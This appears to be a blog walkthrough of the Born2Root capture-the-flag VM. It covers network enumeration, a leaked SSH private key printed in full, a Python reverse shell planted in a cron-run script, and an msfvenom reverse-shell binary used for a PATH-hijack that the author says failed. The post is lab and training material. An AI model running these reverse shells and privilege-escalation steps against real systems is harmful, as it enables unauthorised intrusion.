Amonsec

It's all about security.

A simple blog where you can find different things about digital security.

BootToBeRoot: CTF walkthrough

Introduction

Name: Born2Root

Date release: 10 Jun 2017

Author: Hadi Mene

Series: Born2Root

 

Enumeration

First of all we get the IP address of the VM.

redacted@odin:~$ arp-scan --localnet
Interface: eth0, datalink type: EN10MB (Ethernet) Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/) [redacted] [redacted] [redacted] [redacted] [redacted] [redacted] [redacted] [redacted] [redacted] [redacted] [redacted] [redacted] [redacted] [redacted] [redacted] 192.168.1.29 08:00:27:84:43:c4 CADMUS COMPUTER SYSTEMS (DUP: 2) [redacted] [redacted] [redacted] [redacted] [redacted] [redacted] 8 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.9: 256 hosts scanned in 2.373 seconds (107.88 hosts/sec). 8 responded redacted@odin:~$

Then we can scan the target to find open ports:

redacted@odin:/$ nmap -A -sV -O -p22,80,111,47416 --reason 192.168.1.29
Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-27 15:22 EST Nmap scan report for debian-1.home (192.168.1.29) Host is up, received arp-response (0.00059s latency). PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 64 OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0) | ssh-hostkey: | 1024 3d:6f:40:88:76:6a:1d:a1:fd:91:0f:dc:86:b7:81:13 (DSA) | 2048 eb:29:c0:cb:eb:9a:0b:52:e7:9c:c4:a6:67:dc:33:e1 (RSA) | 256 d4:02:99:b0:e7:7d:40:18:64:df:3b:28:5b:9e:f9:07 (ECDSA) | 256 e9:c4:0c:6d:4b:15:4a:58:4f:69:cd:df:13:76:32:4e (EdDSA) 80/tcp open http syn-ack ttl 64 Apache httpd 2.4.10 ((Debian)) | http-robots.txt: 2 disallowed entries |/wordpress-blog /files |_http-server-header: Apache/2.4.10 (Debian) |http-title: Secretsec Company 111/tcp open rpcbind syn-ack ttl 64 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100024 1 47416/tcp status | 100024 1 49516/udp status 47416/tcp open status syn-ack ttl 64 1 (RPC #100024) MAC Address: 08:00:27:84:43:C4 (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.8 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.59 ms debian-1.home (192.168.1.29) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.61 seconds redacted@odin:/$

The RPC service don't give us useful information, so that's gonna be a web CTF.

 

Secret key

After a quick directory enumeration with the gobuster tool we can find two interesting folder: files and icons

redacted@odin:~$ gobuster -u http://192.168.1.29 -w /usr/share/seclists/Discovery/Web_Content/common.txt -e

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.1.29/
[+] Threads      : 10
[+] Wordlist     : /usr/share/seclists/Discovery/Web_Content/common.txt
[+] Status codes : 204,301,302,307,200
[+] Expanded     : true
=====================================================
http://192.168.1.29/files (Status: 301)
http://192.168.1.29/icons (Status: 301)
http://192.168.1.29/index.html (Status: 200)
http://192.168.1.29/manual (Status: 301)
http://192.168.1.29/robots.txt (Status: 200)
=====================================================
redacted@odin:~$

The first is empty, so useless:

redacted@odin:/$ curl -s -L http://192.168.1.29/files/ | html2text -width 150 |uniq
** Index of /files ** [[ICO]] Name Last_modified Size Description ================================================================================================================================================== [[PARENTDIR]] Parent_Directory -
================================================================================================================================================== Apache/2.4.10 (Debian) Server at 192.168.1.29 Port 80 redacted@odin:/$

But, fortunately for us, the second folder contains a weird txt file named VDSoyuAXiO.txt:

redacted@odin:/$ curl -s -L http://192.168.1.29/icons/ | html2text -width 150 |uniq
** Index of /icons ** [[ICO]] Name Last_modified Size Description ================================================================================================================================================== [[PARENTDIR]] Parent_Directory -
[[ ]] README 2017-06-07 22:29 5.0K
[[TXT]] README.html 2017-06-07 22:29 35K
[[TXT]] VDSoyuAXiO.txt 2017-06-07 22:34 1.6K
[[IMG]] a.gif 2017-06-07 22:29 246
[[IMG]] a.png 2017-06-07 22:29 306
[[IMG]] alert.black.gif 2017-06-07 22:29 242
[[IMG]] alert.black.png 2017-06-07 22:29 293
[[IMG]] alert.red.gif 2017-06-07 22:29 247
[[IMG]] alert.red.png 2017-06-07 22:29 314
[[IMG]] apache_pb.gif 2017-06-07 22:29 4.4K
[[IMG]] apache_pb.png 2017-06-07 22:29 9.5K
[[IMG]] apache_pb.svg 2017-06-07 22:29 260K
[[IMG]] apache_pb2.gif 2017-06-07 22:29 4.1K
[[IMG]] apache_pb2.png 2017-06-07 22:29 10K
[[IMG]] back.gif 2017-06-07 22:29 216
[[IMG]] back.png 2017-06-07 22:29 308
[[IMG]] ball.gray.gif 2017-06-07 22:29 233
[[IMG]] ball.gray.png 2017-06-07 22:29 298
[[IMG]] ball.red.gif 2017-06-07 22:29 205

This is more than a simple txt file, it's a private key. Private key that we will use to log in the server via SSH.

redacted@odin:/$ curl -s -L http://192.168.1.29/icons/VDSoyuAXiO.txt
-----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAoNgGGOyEpn/txphuS2pDA1i2nvRxn6s8DO58QcSsY+/Nm6wC tprVUPb+fmkKvOf5ntACY7c/5fM4y83+UWPG0l90WrjdaTCPaGAHjEpZYKt0lEc0 FiQkXTvJS4faYHNah/mEvhldgTc59jeX4di0f660mJjF31SA9UgMLQReKd5GKtUx 5m+sQq6L+VyA2/6GD/T3qx35AT4argdk1NZ9ONmj1ZcIp0evVJvUul34zuJZ5mDv DZuLRR6QpcMLJRGEFZ4qwkMZn7NavEmfX1Yka6mu9iwxkY6iT45YA1C4p7NEi5yI /P6kDxMfCVELAUaU8fcPolkZ6xLdS6yyThZHHwIDAQABAoIBAAZ+clCTTA/E3n7E LL/SvH3oGQd16xh9O2FyR4YIQMWQKwb7/OgOfEpWjpPf/dT+sK9eypnoDiZkmYhw +rGii6Z2wCXhjN7wXPnj1qotXkpu4bgS3+F8+BLjlQ79ny2Busf+pQNf1syexDJS sEkoDLGTBiubD3Ii4UoF7KfsozihdmQY5qud2c4iE0ioayo2m9XIDreJEB20Q5Ta lV0G03unv/v7OK3g8dAQHrBR9MXuYiorcwxLAe+Gm1h4XanMKDYM5/jW4JO2ITAn kPducC9chbM4NqB3ryNCD4YEgx8zWGDt0wjgyfnsF4fiYEI6tqAwWoB0tdqJFXAy FlQJfYECgYEAz1bFCpGBCApF1k/oaQAyy5tir5NQpttCc0L2U1kiJWNmJSHk/tTX 4+ly0CBUzDkkedY1tVYK7TuH7/tOjh8M1BLa+g+Csb/OWLuMKmpoqyaejmoKkLnB WVGkcdIulfsW7DWVMS/zA8ixJpt7bvY7Y142gkurxqjLMz5s/xT9geECgYEAxpfC fGvogWRYUY07OLE/b7oMVOdBQsmlnaKVybuKf3RjeCYhbiRSzKz05NM/1Cqf359l Wdznq4fkIvr6khliuj8GuCwv6wKn9+nViS18s1bG6Z5UJYSRJRpviCS+9BGShG1s KOf1fAWNwRcn1UKtdQVvaLBX9kIwcmTBrl+e6P8CgYAtz24Zt6xaqmpjv6QKDxEq C1rykAnx0+AKt3DVWYxB1oRrD+IYq85HfPzxHzOdK8LzaHDVb/1aDR0r2MqyfAnJ kaDwPx0RSN++mzGM7ZXSuuWtcaCD+YbOxUsgGuBQIvodlnkwNPfsjhsV/KR5D85v VhGVGEML0Z+T4ucSNQEOAQKBgQCHedfvUR3Xx0CIwbP4xNHlwiHPecMHcNBObS+J 4ypkMF37BOghXx4tCoA16fbNIhbWUsKtPwm79oQnaNeu+ypiq8RFt78orzMu6JIH dsRvA2/Gx3/X6Eur6BDV61to3OP6+zqh3TuWU6OUadt+nHIANqj93e7jy9uI7jtC XXDmuQKBgHZAE6GTq47k4sbFbWqldS79yhjjLloj0VUhValZyAP6XV8JTiAg9CYR 2o1pyGm7j7wfhIZNBP/wwJSC2/NLV6rQeH7Zj8nFv69RcRX56LrQZjFAWWsa/C43 rlJ7dOFH7OFQbGp51ub88M1VOiXR6/fU8OMOkXfi1KkETj/xp6t+ -----END RSA PRIVATE KEY----- redacted@odin:/$

Note, we can find a list of potential user in the home page of the website:

  • Martin N;

  • Hadi M and

  • Jimmy S.

 

First shell

First of all we have to change the permission of this private key if we want to use it.

chmod 700 privatekey

Then we have to find with which user we can use this private key.

redacted@odin:~/Desktop$ for user in hadi jimmy martin; do
for> ssh -i privatekey $user@192.168.1.29 -o 'UserKnownHostsFile /dev/null' for> done The authenticity of host '192.168.1.29 (192.168.1.29)' can't be established. ECDSA key fingerprint is SHA256:YGvYXYw8dQn8xgGpWP4AlYshhJ6D4SqY71chPOERGwE. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.1.29' (ECDSA) to the list of known hosts. hadi@192.168.1.29's password: Permission denied, please try again. hadi@192.168.1.29's password: Permission denied, please try again. hadi@192.168.1.29's password: hadi@192.168.1.29: Permission denied (publickey,password). The authenticity of host '192.168.1.29 (192.168.1.29)' can't be established. ECDSA key fingerprint is SHA256:YGvYXYw8dQn8xgGpWP4AlYshhJ6D4SqY71chPOERGwE. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.1.29' (ECDSA) to the list of known hosts. jimmy@192.168.1.29's password: Permission denied, please try again. jimmy@192.168.1.29's password: Permission denied, please try again. jimmy@192.168.1.29's password: jimmy@192.168.1.29: Permission denied (publickey,password). The authenticity of host '192.168.1.29 (192.168.1.29)' can't be established. ECDSA key fingerprint is SHA256:YGvYXYw8dQn8xgGpWP4AlYshhJ6D4SqY71chPOERGwE. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.1.29' (ECDSA) to the list of known hosts. The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Fri Jun 9 20:31:29 2017 from 192.168.0.42 READY TO ACCESS THE SECRET LAB ? secret password :

Apparently it's with Martin but an extra password is required.

The creator made a mistake or something like that because regardless of the password you enter it's always working. The Python script:

martin@debian:~$ cat .bashrc |tail -1
/var/tmp/login.py
martin@debian:~$ cat /var/tmp/login.py
#!/usr/bin/python

import os

print("")
print("READY TO ACCESS THE SECRET LAB ? ")
print("")
password = raw_input("secret password : ")

if (password) == "secretsec" or "secretlab" :
    print("WELCOME ! ")
else:
    print("GET OUT ! ")
    os.system("pkill -u 'martin'")
martin@debian:~$ 
 

From Martin to Jimmy

After some research we can find a mistake in the /etc/crontab file.  The user Jimmy execute a python script without any security check. We simple have to create a python script named sekurity.py and it will be executed by Jimmy.

martin@debian:~$ cat /etc/crontab 
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user    command
17           root    cd / && run-parts --report /etc/cron.hourly
25 6          root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6      7    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1      root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
/5         jimmy   python /tmp/sekurity.py
martin@debian:~$ 

We can create this simple python reverse shell:

martin@debian:~$ cat /tmp/sekurity.py 
#!/usr/bin/python
import subprocess
import socket
import os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.1.116', 7734))

os.dup2(s.fileno(), 0) #stdin
os.dup2(s.fileno(), 1) #stdout
os.dup2(s.fileno(), 2) #stderr

process = subprocess.call(["/bin/sh","-i"])
martin@debian:~$ 

After few minutes we successfully have a shell with Jimmy's privilege.

 

From jimmy to root

In the Jimmy's home folder we can find the networker binary who apparently execute few network commands. The interesting thing about this binary is that he will be executed with root privilege, so if we find a way to makes this binary execute arbitrary commands we will probably gain root privileges.

Let's check if system commands with relative path are used by this binary:

jimmy@debian:~$ strings networker
strings networker
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
puts
printf
system
cxa_finalize
libc_start_main
_ITM_deregisterTMCloneTable
gmon_start
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.1.3
GLIBC2.0
UWVS
t$,U
[^]
 Networker 2.0  
/sbin/ifconfig
/bin/ping -c 1  localhost 
Done 
echo 'echo linux tool version 5' 
[..snip..]

The echo command looks like a good choice for us. Let's create a binary named echo.

redacted@odin:/var/www/html$ msfvenom -p linux/x86/shell_reverse_tcp LPORT=3477 LHOST=192.168.1.116 -f elf -o echo
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 68 bytes
Final size of elf file: 152 bytes
Saved as: echo

Now, we can download with nc the binary. Note, curl and wget are restricted and unusable.

[Targeted system]
jimmy@debian:~$ nc -lvvp 7777 > echo
nc -lvvp 7777 > echo
listening on [any] 7777 ...
connect to [192.168.1.29] from kali-1.home [192.168.1.116] 35672
 sent 0, rcvd 152
jimmy@debian:~$


[My system]
redacted@odin:/var/www/html$ nc -nvv 192.168.1.29 7777 < echo
(UNKNOWN) [192.168.1.29] 7777 (?) open ^C sent 152, rcvd 0 redacted@odin:/var/www/html$

Finally we change the PATH environment variable and we will be good to go.

jimmy@debian:~$ export PATH=/home/jimmy:$PATH
export PATH=/home/jimmy:$PATH
jimmy@debian:~$ echo $PATH
echo $PATH
/home/jimmy:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
jimmy@debian:~$

Unfortunately for us, the creator made another mistake with this binary and we are not able to exploit this vulnerability in the networker binary.

 
 

break